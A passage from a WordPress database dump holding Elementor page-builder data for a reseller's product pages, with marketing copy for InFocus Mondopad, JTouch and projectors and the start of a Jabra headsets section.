]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(8605,3655,'_elementor_version','2.7.4'),(8606,3656,'_edit_lock','1571988768:1'),(8491,1531,'_elementor_edit_mode','builder'),(8492,1531,'_elementor_template_type','post'),(8493,1531,'_elementor_version','2.5.14'),(8499,1531,'_elementor_data','[{\"id\":\"8a45f02\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":712,\"sizes\":[]}},\"elements\":[{\"id\":\"0b0300d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"38bdbb7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\"><strong><em>InFocus<\\/em> offers collaboration solutions - projectors, interactive displays, display wall processors, videoconferencing services - connect anyone\\/anytime\\/anywhere<wbr \\/>.<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3f7b778\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"63564f9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":32.793},\"elements\":[{\"id\":\"a82c941\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Mondopad<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">Flexible, collaborative touchscreen solutions that work the way you do.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c6de813\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":67.207},\"elements\":[{\"id\":\"107870f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Collaboration that Fits<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">The Mondopad family of touchscreen collaboration solutions help teams work together more efficiently\\u2014in the same room or around the world. Collaborate visually, capture and share information, bridge communication gaps, and strengthen teams to do better work in less time. Available with an array of features and sizes, Mondopad offers a collaboration solution that meets the unique needs of your team and your meeting space.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c233d18\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"674cc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f8fdf81\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>MONDOPAD ULTRA<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">The complete, all-in-one touchscreen collaboration system for efficient face-to-face collaboration with people anywhere around the globe. Conduct video conferences, draw on a whiteboard, share data, and more\\u2014all from one seamlessly integrated platform.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e9c0309\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7dc1553\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Mondopad Launch<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">Fully configurable and video conferencing-ready, Mondopad Launch offers a touchscreen display, a built-in whiteboard, multi-user casting, and a custom meeting launch interface\\u2014so that you can quickly access your favorite apps or tools in any group workspace.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1a3f3b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a261824\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Mondopad Core<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">The easiest way to share information and ideas in your meeting space. Draw or write on a digital whiteboard, share content wirelessly, or browse the web\\u2014Mondopad Core is the simple, affordable way to outfit any space with the most essential collaboration tools. Add a PC to design a collaboration solution for your specific needs.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b2f3539\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b128293\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"dc1a7bb\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2fd16fc\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0bb6982\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"15b1086\",\"elType\":\"widget\",\"settings\":{\"title\":\"JTouch\",\"align\":\"center\",\"title_color\":\"#424242\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b678236\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"6afb66f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"34\",\"right\":\"34\",\"bottom\":\"34\",\"left\":\"34\",\"isLinked\":true}},\"elements\":[{\"id\":\"ec6caba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\">Touchscreens that Enhance Collaboration &amp; Captivate Audiences<\\/h3><div class=\\\"headline\\\"><p style=\\\"text-align: center;\\\">Whether you\\u2019re in a classroom or huddle space, a conference room or auditorium, there\\u2019s a JTouch interactive display solution to fit your needs and engage your audience.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"aee49ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"00042c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><img class=\\\"alignnone wp-image-2290 size-medium aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/419dcbae80ab7e36103599ac5e712aca_InFocus-JTOUCH-Hero-300x200.png\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"200\\\" \\/><\\/h4>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2835877\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"86e6d6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"81a4325\",\"elType\":\"widget\",\"settings\":{\"title\":\"Key Features\",\"align\":\"center\",\"title_color\":\"#424242\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"787904f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"3e45298\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"44fe092\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Incredibly sharp 4K or 1080p HD resolution<\\/li><li>Content is interactive, bright and crisp in any light<\\/li><li>Run all your apps, even the older ones, with touch<\\/li><li>Accurate and responsive touch overlay with multi-touch capability<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"efd7735\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"48e357c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Wirelessly cast from any device, browse the web, or view documents<\\/li><li>Create and share on an interactive whiteboard<\\/li><li>No calibration required<\\/li><li>Available in sizes ranging from 55- to 86-inches<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e49605c\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e6d4faa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e3f7bfc\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"212b30f\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"4bb7a43\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c9c800f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong><span style=\\\"color: #333333; font-family: Raleway, Helvetica, Arial, sans-serif; font-size: 1.25rem;\\\">Projectors<\\/span><\\/strong><\\/h3><p style=\\\"text-align: center;\\\">Office to classroom, ultra-portable to large-venue, InFocus projectors deliver superior performance and value in any setting.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c3fc489\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27d5573\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Classroom Projectors<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">Incredible Value and Connectivity<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"70fb19f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"51dba37\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Meeting Room<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">Superior Performance and Quality for Business<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1da15e8\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"3556afd\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"262f531\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Portable Projectors<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">Compact, Lightweight, Powerful<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9f57576\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"de23cec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Large Venue Projectors<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">High-performance projectors<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"36eb1a0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"853600f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"73dc00c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">Jupiter by InFocus<\\/h2><p class=\\\"lead_text--paragraph\\\" style=\\\"text-align: center;\\\">The ability to see everything that\\u2019s important at once is invaluable. Jupiter by InFocus technologies display all your data sources and video-conferencing feeds together on a single wall.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2665a12\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"35fa5b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5513182\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>ConX Cloud<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">ConX Cloud provides simple, cost-effective, cloud-based video meeting rooms for everyone at anytime.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"58f81672\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4c32d854\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2760c22c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(8500,3644,'_wp_page_template','template-fullwidth.php'),(8501,3644,'_elementor_edit_mode','builder'),(8502,3644,'_elementor_template_type','post'),(8503,3644,'_elementor_version','2.5.14'),(8504,3644,'_elementor_data','[{\"id\":\"8a45f02\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":712,\"sizes\":[]}},\"elements\":[{\"id\":\"0b0300d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"38bdbb7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\"><strong><em>InFocus<\\/em> offers collaboration solutions - projectors, interactive displays, display wall processors, videoconferencing services - connect anyone\\/anytime\\/anywhere<wbr \\/>.<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3f7b778\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"63564f9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":32.793},\"elements\":[{\"id\":\"a82c941\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Mondopad<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">Flexible, collaborative touchscreen solutions that work the way you do.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c6de813\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":67.207},\"elements\":[{\"id\":\"107870f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Collaboration that Fits<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">The Mondopad family of touchscreen collaboration solutions help teams work together more efficiently\\u2014in the same room or around the world. Collaborate visually, capture and share information, bridge communication gaps, and strengthen teams to do better work in less time. Available with an array of features and sizes, Mondopad offers a collaboration solution that meets the unique needs of your team and your meeting space.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c233d18\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"674cc6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f8fdf81\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>MONDOPAD ULTRA<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">The complete, all-in-one touchscreen collaboration system for efficient face-to-face collaboration with people anywhere around the globe. Conduct video conferences, draw on a whiteboard, share data, and more\\u2014all from one seamlessly integrated platform.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e9c0309\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7dc1553\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Mondopad Launch<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">Fully configurable and video conferencing-ready, Mondopad Launch offers a touchscreen display, a built-in whiteboard, multi-user casting, and a custom meeting launch interface\\u2014so that you can quickly access your favorite apps or tools in any group workspace.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1a3f3b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a261824\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Mondopad Core<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">The easiest way to share information and ideas in your meeting space. Draw or write on a digital whiteboard, share content wirelessly, or browse the web\\u2014Mondopad Core is the simple, affordable way to outfit any space with the most essential collaboration tools. Add a PC to design a collaboration solution for your specific needs.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b2f3539\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b128293\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"dc1a7bb\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2fd16fc\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0bb6982\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"15b1086\",\"elType\":\"widget\",\"settings\":{\"title\":\"JTouch\",\"align\":\"center\",\"title_color\":\"#424242\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b678236\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"6afb66f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"34\",\"right\":\"34\",\"bottom\":\"34\",\"left\":\"34\",\"isLinked\":true}},\"elements\":[{\"id\":\"ec6caba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\">Touchscreens that Enhance Collaboration &amp; Captivate Audiences<\\/h3><div class=\\\"headline\\\"><p style=\\\"text-align: center;\\\">Whether you\\u2019re in a classroom or huddle space, a conference room or auditorium, there\\u2019s a JTouch interactive display solution to fit your needs and engage your audience.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"aee49ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"00042c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><img class=\\\"alignnone wp-image-2290 size-medium aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/419dcbae80ab7e36103599ac5e712aca_InFocus-JTOUCH-Hero-300x200.png\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"200\\\" \\/><\\/h4>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2835877\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"86e6d6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"81a4325\",\"elType\":\"widget\",\"settings\":{\"title\":\"Key Features\",\"align\":\"center\",\"title_color\":\"#424242\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"787904f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"3e45298\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"44fe092\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Incredibly sharp 4K or 1080p HD resolution<\\/li><li>Content is interactive, bright and crisp in any light<\\/li><li>Run all your apps, even the older ones, with touch<\\/li><li>Accurate and responsive touch overlay with multi-touch capability<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"efd7735\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"48e357c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Wirelessly cast from any device, browse the web, or view documents<\\/li><li>Create and share on an interactive whiteboard<\\/li><li>No calibration required<\\/li><li>Available in sizes ranging from 55- to 86-inches<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e49605c\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e6d4faa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e3f7bfc\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"212b30f\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"4bb7a43\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c9c800f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong><span style=\\\"color: #333333; font-family: Raleway, Helvetica, Arial, sans-serif; font-size: 1.25rem;\\\">Projectors<\\/span><\\/strong><\\/h3><p style=\\\"text-align: center;\\\">Office to classroom, ultra-portable to large-venue, InFocus projectors deliver superior performance and value in any setting.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c3fc489\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27d5573\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Classroom Projectors<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">Incredible Value and Connectivity<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"70fb19f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"51dba37\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Meeting Room<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">Superior Performance and Quality for Business<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1da15e8\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"3556afd\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"262f531\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Portable Projectors<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">Compact, Lightweight, Powerful<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9f57576\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"de23cec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Large Venue Projectors<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">High-performance projectors<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"36eb1a0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"853600f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"73dc00c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">Jupiter by InFocus<\\/h2><p class=\\\"lead_text--paragraph\\\" style=\\\"text-align: center;\\\">The ability to see everything that\\u2019s important at once is invaluable. Jupiter by InFocus technologies display all your data sources and video-conferencing feeds together on a single wall.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2665a12\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"35fa5b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5513182\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>ConX Cloud<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">ConX Cloud provides simple, cost-effective, cloud-based video meeting rooms for everyone at anytime.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"58f81672\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4c32d854\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2760c22c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(8603,3655,'_elementor_edit_mode','builder'),(8604,3655,'_elementor_template_type','wp-page'),(8601,3655,'_edit_lock','1571988703:1'),(8602,3655,'_edit_last','1'),(8522,3647,'_elementor_data','[{\"id\":\"9b05eed\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e3e83dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"272a30b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h1 style=\\\"text-align: center;\\\"><strong>Jabra<\\/strong><\\/h1><h3 style=\\\"text-align: center;\\\">Sound that\\u2019s engineered for you<\\/h3><p>We engineer true wireless earbuds offering you total freedom noise-cancelling headsets allowing you to block out unwanted background sound; high definition headsets letting those you\\u2019re speaking to hear you with crystal-clear clarity and state-of-the-art fitness tracking sports headphones that aid you in beating your personal best. Each product helps you hear more, do more, and be more.<\\/p><p>With Jabra, you know that you are getting the best products on the market. They are engineered to be so.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba72cc4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c728c08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"63d6963\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Jabra Evolve Series<\\/h2><h3>Engineered to be the best professional headsets to enhance productivity in the open office<\\/h3>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"828f173\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"03\",\"right\":\"03\",\"bottom\":\"03\",\"left\":\"03\",\"isLinked\":true},\"border_color\":\"#e2e2e2\",\"border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[{\"id\":\"1f337bb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":28.919,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"9a63143\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve.jpg\",\"id\":2851},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"05c6f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":71.081,\"margin\":{\"unit\":\"px\",\"top\":\"43\",\"right\":\"43\",\"bottom\":\"43\",\"left\":\"43\",\"isLinked\":true}},\"elements\":[{\"id\":\"5625496\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Better concentration, greater productivity<\\/h3><p>The Jabra Evolve Series is a professional range of headsets offering best-in-class noise cancellation to aid concentration in open office environments.<\\/p><ul><li>World-class speakers to deliver amazing sound for calls and music.<\\/li><li>Call-management features allow for incredible ease-of-use..<\\/li><li>Compatible with all leading UC platforms.<\\/li><\\/ul>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"337d102\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1b419c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b34a6f3\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"41e7d34\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"12\",\"right\":0,\"bottom\":\"12\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"01d0215\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"background_color\":\"#f9f9f9\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinke